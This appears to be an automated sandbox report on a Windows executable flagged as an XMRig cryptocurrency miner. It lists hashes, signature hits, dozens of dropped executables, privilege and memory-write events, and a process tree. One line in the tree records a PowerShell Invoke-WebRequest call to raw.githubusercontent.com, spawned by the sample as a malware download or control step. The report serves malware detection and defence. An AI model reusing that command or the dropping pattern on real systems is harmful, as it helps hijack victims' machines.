xmrig | 9671cfa8131301234941c9f9018af16d3e934e50259df68254f934e5bc4f2f3a

Analysis

max time kernel
32s
max time network
46s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
28/04/2024, 06:57

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
Size

1.8MB
MD5

049fe27e91ac667a315e9d07eb964d9b
SHA1

90d82739bbeef7d32412a6416ca2a48ccce8b747
SHA256

9671cfa8131301234941c9f9018af16d3e934e50259df68254f934e5bc4f2f3a
SHA512

56e231793ced760319629ba7f682408dd64db6a82c096918f2c1d15aa5c4d86030134ce843782d219fb864ee785a360b6704dbda4922c480d4fe427a4ace20cc
SSDEEP

49152:Lz071uv4BPMkibTIA5sf6r+WVc2HhG82SflDrl8z:NABV

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 17 IoCs

miner

resource	yara_rule
behavioral2/memory/1256-55-0x00007FF60D2A0000-0x00007FF60D692000-memory.dmp	xmrig
behavioral2/memory/5080-57-0x00007FF64CAF0000-0x00007FF64CEE2000-memory.dmp	xmrig
behavioral2/memory/3412-56-0x00007FF6BA680000-0x00007FF6BAA72000-memory.dmp	xmrig
behavioral2/memory/3044-54-0x00007FF7DEC30000-0x00007FF7DF022000-memory.dmp	xmrig
behavioral2/memory/2452-53-0x00007FF726030000-0x00007FF726422000-memory.dmp	xmrig
behavioral2/memory/1968-75-0x00007FF75EEC0000-0x00007FF75F2B2000-memory.dmp	xmrig
behavioral2/memory/4800-95-0x00007FF739000000-0x00007FF7393F2000-memory.dmp	xmrig
behavioral2/memory/2424-92-0x00007FF7303F0000-0x00007FF7307E2000-memory.dmp	xmrig
behavioral2/memory/4464-85-0x00007FF719A10000-0x00007FF719E02000-memory.dmp	xmrig
behavioral2/memory/1248-84-0x00007FF71D9B0000-0x00007FF71DDA2000-memory.dmp	xmrig
behavioral2/memory/2864-151-0x00007FF7AD450000-0x00007FF7AD842000-memory.dmp	xmrig
behavioral2/memory/3476-150-0x00007FF72BBE0000-0x00007FF72BFD2000-memory.dmp	xmrig
behavioral2/memory/2584-146-0x00007FF610EC0000-0x00007FF6112B2000-memory.dmp	xmrig
behavioral2/memory/4472-145-0x00007FF7B1220000-0x00007FF7B1612000-memory.dmp	xmrig
behavioral2/memory/936-133-0x00007FF6ECA10000-0x00007FF6ECE02000-memory.dmp	xmrig
behavioral2/memory/4992-110-0x00007FF6D96B0000-0x00007FF6D9AA2000-memory.dmp	xmrig
behavioral2/memory/3388-1417-0x00007FF7CAFC0000-0x00007FF7CB3B2000-memory.dmp	xmrig

Blocklisted process makes network request 8 IoCs

flow	pid	Process
3	1012	powershell.exe
5	1012	powershell.exe
9	1012	powershell.exe
10	1012	powershell.exe
12	1012	powershell.exe
13	1012	powershell.exe
15	1012	powershell.exe
25	1012	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
2584	vmyFwVf.exe
3476	GPgeAoo.exe
2452	OxdsFWV.exe
3044	uyHyCuS.exe
1256	FWmEaDk.exe
3412	WiGtjuf.exe
5080	lhJLVPz.exe
3388	pJGDlts.exe
1968	uwsxkEH.exe
1248	bpSkBej.exe
4464	gwACVRx.exe
2424	CarhTme.exe
4800	lketRMY.exe
3440	vsdVsNv.exe
4992	PffrvKd.exe
3344	PVJXjmo.exe
732	jQmtSPS.exe
4472	jofUXxs.exe
1020	FgXQeDe.exe
464	BVoUFmr.exe
2864	VSogfHl.exe
2072	elKrukh.exe
868	erAwPsX.exe
4900	dVPDIgC.exe
3384	YQzRUsg.exe
2172	OBuTIHD.exe
4212	GoMWPqC.exe
396	nMTbpym.exe
4640	kXGYcPu.exe
1400	Klvdlyy.exe
3136	GhEToPx.exe
2060	aKtDnIZ.exe
4748	QGHaqEk.exe
4380	odRLlGv.exe
5032	zCFQUkq.exe
1928	RowBGDB.exe
4496	VLOVQCg.exe
2032	WvddONE.exe
3416	YSpfEVr.exe
2460	xRZPqWI.exe
3036	TaUSuZo.exe
3228	LirfUuA.exe
4320	xaKrSrf.exe
4224	ywCqjYA.exe
2992	vWzvjzs.exe
756	OJrZZks.exe
860	vYUwOdQ.exe
224	NerNbnF.exe
2868	bTESnyB.exe
4736	fjuxHKN.exe
4516	iAtQAqb.exe
3880	xYKnUoh.exe
3340	DJVabTX.exe
4188	pdteTbT.exe
3788	oVBJUGC.exe
1920	cibWTTU.exe
2912	mtidnjl.exe
3960	LHXpaSR.exe
2696	YEWSUsW.exe
1080	YtBsqJM.exe
3292	gBdRIZU.exe
4492	VPmnKfs.exe
3652	mhdvhvd.exe
768	ZhAtcSF.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/936-0-0x00007FF6ECA10000-0x00007FF6ECE02000-memory.dmp	upx
behavioral2/files/0x0007000000023477-7.dat	upx
behavioral2/files/0x0008000000023476-11.dat	upx
behavioral2/files/0x000700000002347a-30.dat	upx
behavioral2/files/0x000700000002347b-35.dat	upx
behavioral2/files/0x0007000000023479-33.dat	upx
behavioral2/files/0x0007000000023478-23.dat	upx
behavioral2/memory/1256-55-0x00007FF60D2A0000-0x00007FF60D692000-memory.dmp	upx
behavioral2/memory/3388-58-0x00007FF7CAFC0000-0x00007FF7CB3B2000-memory.dmp	upx
behavioral2/files/0x000700000002347c-61.dat	upx
behavioral2/memory/5080-57-0x00007FF64CAF0000-0x00007FF64CEE2000-memory.dmp	upx
behavioral2/memory/3412-56-0x00007FF6BA680000-0x00007FF6BAA72000-memory.dmp	upx
behavioral2/memory/3044-54-0x00007FF7DEC30000-0x00007FF7DF022000-memory.dmp	upx
behavioral2/memory/2452-53-0x00007FF726030000-0x00007FF726422000-memory.dmp	upx
behavioral2/memory/3476-21-0x00007FF72BBE0000-0x00007FF72BFD2000-memory.dmp	upx
behavioral2/files/0x0009000000023470-12.dat	upx
behavioral2/memory/2584-8-0x00007FF610EC0000-0x00007FF6112B2000-memory.dmp	upx
behavioral2/files/0x000800000002347e-77.dat	upx
behavioral2/files/0x0009000000023474-76.dat	upx
behavioral2/memory/1968-75-0x00007FF75EEC0000-0x00007FF75F2B2000-memory.dmp	upx
behavioral2/files/0x000700000002347d-69.dat	upx
behavioral2/files/0x000800000002347f-90.dat	upx
behavioral2/files/0x0007000000023480-89.dat	upx
behavioral2/memory/4800-95-0x00007FF739000000-0x00007FF7393F2000-memory.dmp	upx
behavioral2/memory/2424-92-0x00007FF7303F0000-0x00007FF7307E2000-memory.dmp	upx
behavioral2/memory/4464-85-0x00007FF719A10000-0x00007FF719E02000-memory.dmp	upx
behavioral2/memory/1248-84-0x00007FF71D9B0000-0x00007FF71DDA2000-memory.dmp	upx
behavioral2/files/0x0007000000023481-98.dat	upx
behavioral2/memory/3440-100-0x00007FF71EE00000-0x00007FF71F1F2000-memory.dmp	upx
behavioral2/files/0x0007000000023482-108.dat	upx
behavioral2/files/0x0007000000023483-113.dat	upx
behavioral2/files/0x0007000000023487-124.dat	upx
behavioral2/memory/1020-129-0x00007FF731160000-0x00007FF731552000-memory.dmp	upx
behavioral2/files/0x0007000000023489-147.dat	upx
behavioral2/files/0x000700000002348a-152.dat	upx
behavioral2/files/0x000700000002348c-167.dat	upx
behavioral2/files/0x000700000002348e-180.dat	upx
behavioral2/files/0x0007000000023494-202.dat	upx
behavioral2/files/0x0007000000023492-200.dat	upx
behavioral2/files/0x0007000000023493-197.dat	upx
behavioral2/files/0x0007000000023491-195.dat	upx
behavioral2/files/0x0007000000023490-190.dat	upx
behavioral2/files/0x000700000002348f-185.dat	upx
behavioral2/files/0x000700000002348d-175.dat	upx
behavioral2/files/0x000700000002348b-160.dat	upx
behavioral2/memory/2864-151-0x00007FF7AD450000-0x00007FF7AD842000-memory.dmp	upx
behavioral2/memory/3476-150-0x00007FF72BBE0000-0x00007FF72BFD2000-memory.dmp	upx
behavioral2/memory/2584-146-0x00007FF610EC0000-0x00007FF6112B2000-memory.dmp	upx
behavioral2/memory/4472-145-0x00007FF7B1220000-0x00007FF7B1612000-memory.dmp	upx
behavioral2/files/0x0007000000023488-142.dat	upx
behavioral2/files/0x0007000000023486-136.dat	upx
behavioral2/files/0x0007000000023485-135.dat	upx
behavioral2/memory/936-133-0x00007FF6ECA10000-0x00007FF6ECE02000-memory.dmp	upx
behavioral2/memory/464-130-0x00007FF6507B0000-0x00007FF650BA2000-memory.dmp	upx
behavioral2/files/0x0007000000023484-126.dat	upx
behavioral2/memory/732-125-0x00007FF74D8D0000-0x00007FF74DCC2000-memory.dmp	upx
behavioral2/memory/3344-120-0x00007FF6D0C50000-0x00007FF6D1042000-memory.dmp	upx
behavioral2/memory/4992-110-0x00007FF6D96B0000-0x00007FF6D9AA2000-memory.dmp	upx
behavioral2/memory/3388-1417-0x00007FF7CAFC0000-0x00007FF7CB3B2000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
3	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\ZNHlHKl.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\NcwbUxs.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\MhLvOIK.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\lnUIgyG.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\ZOyYSSW.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\zUQKiue.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\ptaUkwk.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\bwHkaxS.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\kgNpZlV.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\IShPBHs.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\rzzCdfj.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\BlGYfge.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\wkWOZiF.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\lnhqXkO.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\jWEVaIr.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\EREscGc.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\qjOzNot.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\VqvjDBU.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\UDDVhEP.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\nDAcZOR.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\YwOprlP.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\xqmvbcZ.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\ivUWvUX.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\isjwnEo.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\IENQtkK.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\iwWEiZj.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\ygDSpch.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\AXuiIMF.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\iXXTRVA.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\cMWYLBa.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\GAHzoQf.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\BaEOxTO.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\yVXQODD.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\CBctGSa.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\xYKnUoh.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\DVFXoaI.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\wcLoGkx.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\IPYzyje.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\MUVKqFW.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\SQNdEVs.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\QGHaqEk.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\cMMPRxh.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\kTvvIuy.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\DvFFznQ.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\KVlqtCG.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\YulHDkD.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\mfkWyTI.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\dDlZgOZ.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\VOoipyD.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\Xooptur.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\rPxyvOH.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\IhZgbnt.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\zFOxkbl.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\CxlJGeI.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\vjKwLpt.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\hSwmoUx.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\qLaPAoJ.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\DHQzsGe.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\fmuWShU.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\wMjseOH.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\kokmSBK.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\uPvTGWL.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\nMchFnH.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
File created	C:\Windows\System\zxyJENA.exe	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1012	powershell.exe
1012	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
Token: SeLockMemoryPrivilege	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
Token: SeDebugPrivilege	1012	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 936 wrote to memory of 1012	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	84
PID 936 wrote to memory of 1012	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	84
PID 936 wrote to memory of 2584	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	85
PID 936 wrote to memory of 2584	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	85
PID 936 wrote to memory of 3476	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	86
PID 936 wrote to memory of 3476	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	86
PID 936 wrote to memory of 2452	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	87
PID 936 wrote to memory of 2452	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	87
PID 936 wrote to memory of 3044	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	88
PID 936 wrote to memory of 3044	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	88
PID 936 wrote to memory of 1256	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	89
PID 936 wrote to memory of 1256	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	89
PID 936 wrote to memory of 3412	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	90
PID 936 wrote to memory of 3412	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	90
PID 936 wrote to memory of 5080	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	91
PID 936 wrote to memory of 5080	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	91
PID 936 wrote to memory of 3388	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	92
PID 936 wrote to memory of 3388	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	92
PID 936 wrote to memory of 1968	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	93
PID 936 wrote to memory of 1968	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	93
PID 936 wrote to memory of 1248	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	95
PID 936 wrote to memory of 1248	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	95
PID 936 wrote to memory of 4464	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	96
PID 936 wrote to memory of 4464	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	96
PID 936 wrote to memory of 2424	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	97
PID 936 wrote to memory of 2424	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	97
PID 936 wrote to memory of 4800	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	98
PID 936 wrote to memory of 4800	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	98
PID 936 wrote to memory of 3440	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	99
PID 936 wrote to memory of 3440	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	99
PID 936 wrote to memory of 4992	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	101
PID 936 wrote to memory of 4992	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	101
PID 936 wrote to memory of 3344	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	102
PID 936 wrote to memory of 3344	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	102
PID 936 wrote to memory of 732	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	103
PID 936 wrote to memory of 732	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	103
PID 936 wrote to memory of 4472	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	104
PID 936 wrote to memory of 4472	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	104
PID 936 wrote to memory of 1020	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	105
PID 936 wrote to memory of 1020	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	105
PID 936 wrote to memory of 464	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	106
PID 936 wrote to memory of 464	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	106
PID 936 wrote to memory of 2864	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	107
PID 936 wrote to memory of 2864	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	107
PID 936 wrote to memory of 2072	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	108
PID 936 wrote to memory of 2072	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	108
PID 936 wrote to memory of 868	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	109
PID 936 wrote to memory of 868	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	109
PID 936 wrote to memory of 4900	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	110
PID 936 wrote to memory of 4900	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	110
PID 936 wrote to memory of 3384	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	111
PID 936 wrote to memory of 3384	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	111
PID 936 wrote to memory of 2172	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	112
PID 936 wrote to memory of 2172	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	112
PID 936 wrote to memory of 4212	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	113
PID 936 wrote to memory of 4212	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	113
PID 936 wrote to memory of 396	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	114
PID 936 wrote to memory of 396	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	114
PID 936 wrote to memory of 4640	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	115
PID 936 wrote to memory of 4640	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	115
PID 936 wrote to memory of 1400	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	116
PID 936 wrote to memory of 1400	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	116
PID 936 wrote to memory of 3136	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	117
PID 936 wrote to memory of 3136	936	049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe	117

C:\Users\Admin\AppData\Local\Temp\049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\049fe27e91ac667a315e9d07eb964d9b_JaffaCakes118.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1012
- C:\Windows\System\vmyFwVf.exe
  C:\Windows\System\vmyFwVf.exe
  2⤵
  - Executes dropped EXE
  PID:2584
- C:\Windows\System\GPgeAoo.exe
  C:\Windows\System\GPgeAoo.exe
  2⤵
  - Executes dropped EXE
  PID:3476
- C:\Windows\System\OxdsFWV.exe
  C:\Windows\System\OxdsFWV.exe
  2⤵
  - Executes dropped EXE
  PID:2452
- C:\Windows\System\uyHyCuS.exe
  C:\Windows\System\uyHyCuS.exe
  2⤵
  - Executes dropped EXE
  PID:3044
- C:\Windows\System\FWmEaDk.exe
  C:\Windows\System\FWmEaDk.exe
  2⤵
  - Executes dropped EXE
  PID:1256
- C:\Windows\System\WiGtjuf.exe
  C:\Windows\System\WiGtjuf.exe
  2⤵
  - Executes dropped EXE
  PID:3412
- C:\Windows\System\lhJLVPz.exe
  C:\Windows\System\lhJLVPz.exe
  2⤵
  - Executes dropped EXE
  PID:5080
- C:\Windows\System\pJGDlts.exe
  C:\Windows\System\pJGDlts.exe
  2⤵
  - Executes dropped EXE
  PID:3388
- C:\Windows\System\uwsxkEH.exe
  C:\Windows\System\uwsxkEH.exe
  2⤵
  - Executes dropped EXE
  PID:1968
- C:\Windows\System\bpSkBej.exe
  C:\Windows\System\bpSkBej.exe
  2⤵
  - Executes dropped EXE
  PID:1248
- C:\Windows\System\gwACVRx.exe
  C:\Windows\System\gwACVRx.exe
  2⤵
  - Executes dropped EXE
  PID:4464
- C:\Windows\System\CarhTme.exe
  C:\Windows\System\CarhTme.exe
  2⤵
  - Executes dropped EXE
  PID:2424
- C:\Windows\System\lketRMY.exe
  C:\Windows\System\lketRMY.exe
  2⤵
  - Executes dropped EXE
  PID:4800
- C:\Windows\System\vsdVsNv.exe
  C:\Windows\System\vsdVsNv.exe
  2⤵
  - Executes dropped EXE
  PID:3440
- C:\Windows\System\PffrvKd.exe
  C:\Windows\System\PffrvKd.exe
  2⤵
  - Executes dropped EXE
  PID:4992
- C:\Windows\System\PVJXjmo.exe
  C:\Windows\System\PVJXjmo.exe
  2⤵
  - Executes dropped EXE
  PID:3344
- C:\Windows\System\jQmtSPS.exe
  C:\Windows\System\jQmtSPS.exe
  2⤵
  - Executes dropped EXE
  PID:732
- C:\Windows\System\jofUXxs.exe
  C:\Windows\System\jofUXxs.exe
  2⤵
  - Executes dropped EXE
  PID:4472
- C:\Windows\System\FgXQeDe.exe
  C:\Windows\System\FgXQeDe.exe
  2⤵
  - Executes dropped EXE
  PID:1020
- C:\Windows\System\BVoUFmr.exe
  C:\Windows\System\BVoUFmr.exe
  2⤵
  - Executes dropped EXE
  PID:464
- C:\Windows\System\VSogfHl.exe
  C:\Windows\System\VSogfHl.exe
  2⤵
  - Executes dropped EXE
  PID:2864
- C:\Windows\System\elKrukh.exe
  C:\Windows\System\elKrukh.exe
  2⤵
  - Executes dropped EXE
  PID:2072
- C:\Windows\System\erAwPsX.exe
  C:\Windows\System\erAwPsX.exe
  2⤵
  - Executes dropped EXE
  PID:868
- C:\Windows\System\dVPDIgC.exe
  C:\Windows\System\dVPDIgC.exe
  2⤵
  - Executes dropped EXE
  PID:4900
- C:\Windows\System\YQzRUsg.exe
  C:\Windows\System\YQzRUsg.exe
  2⤵
  - Executes dropped EXE
  PID:3384
- C:\Windows\System\OBuTIHD.exe
  C:\Windows\System\OBuTIHD.exe
  2⤵
  - Executes dropped EXE
  PID:2172
- C:\Windows\System\GoMWPqC.exe
  C:\Windows\System\GoMWPqC.exe
  2⤵
  - Executes dropped EXE
  PID:4212
- C:\Windows\System\nMTbpym.exe
  C:\Windows\System\nMTbpym.exe
  2⤵
  - Executes dropped EXE
  PID:396
- C:\Windows\System\kXGYcPu.exe
  C:\Windows\System\kXGYcPu.exe
  2⤵
  - Executes dropped EXE
  PID:4640
- C:\Windows\System\Klvdlyy.exe
  C:\Windows\System\Klvdlyy.exe
  2⤵
  - Executes dropped EXE
  PID:1400
- C:\Windows\System\GhEToPx.exe
  C:\Windows\System\GhEToPx.exe
  2⤵
  - Executes dropped EXE
  PID:3136
- C:\Windows\System\aKtDnIZ.exe
  C:\Windows\System\aKtDnIZ.exe
  2⤵
  - Executes dropped EXE
  PID:2060
- C:\Windows\System\QGHaqEk.exe
  C:\Windows\System\QGHaqEk.exe
  2⤵
  - Executes dropped EXE
  PID:4748
- C:\Windows\System\odRLlGv.exe
  C:\Windows\System\odRLlGv.exe
  2⤵
  - Executes dropped EXE
  PID:4380
- C:\Windows\System\zCFQUkq.exe
  C:\Windows\System\zCFQUkq.exe
  2⤵
  - Executes dropped EXE
  PID:5032
- C:\Windows\System\RowBGDB.exe
  C:\Windows\System\RowBGDB.exe
  2⤵
  - Executes dropped EXE
  PID:1928
- C:\Windows\System\VLOVQCg.exe
  C:\Windows\System\VLOVQCg.exe
  2⤵
  - Executes dropped EXE
  PID:4496
- C:\Windows\System\WvddONE.exe
  C:\Windows\System\WvddONE.exe
  2⤵
  - Executes dropped EXE
  PID:2032
- C:\Windows\System\YSpfEVr.exe
  C:\Windows\System\YSpfEVr.exe
  2⤵
  - Executes dropped EXE
  PID:3416
- C:\Windows\System\xRZPqWI.exe
  C:\Windows\System\xRZPqWI.exe
  2⤵
  - Executes dropped EXE
  PID:2460
